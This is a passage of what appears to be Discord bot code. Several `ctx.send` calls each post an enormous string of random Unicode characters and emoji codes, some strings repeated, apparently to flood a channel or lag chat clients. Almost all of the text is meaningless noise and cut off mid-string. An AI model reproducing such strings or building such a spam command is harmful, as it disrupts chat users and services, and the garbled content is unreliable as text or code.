᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ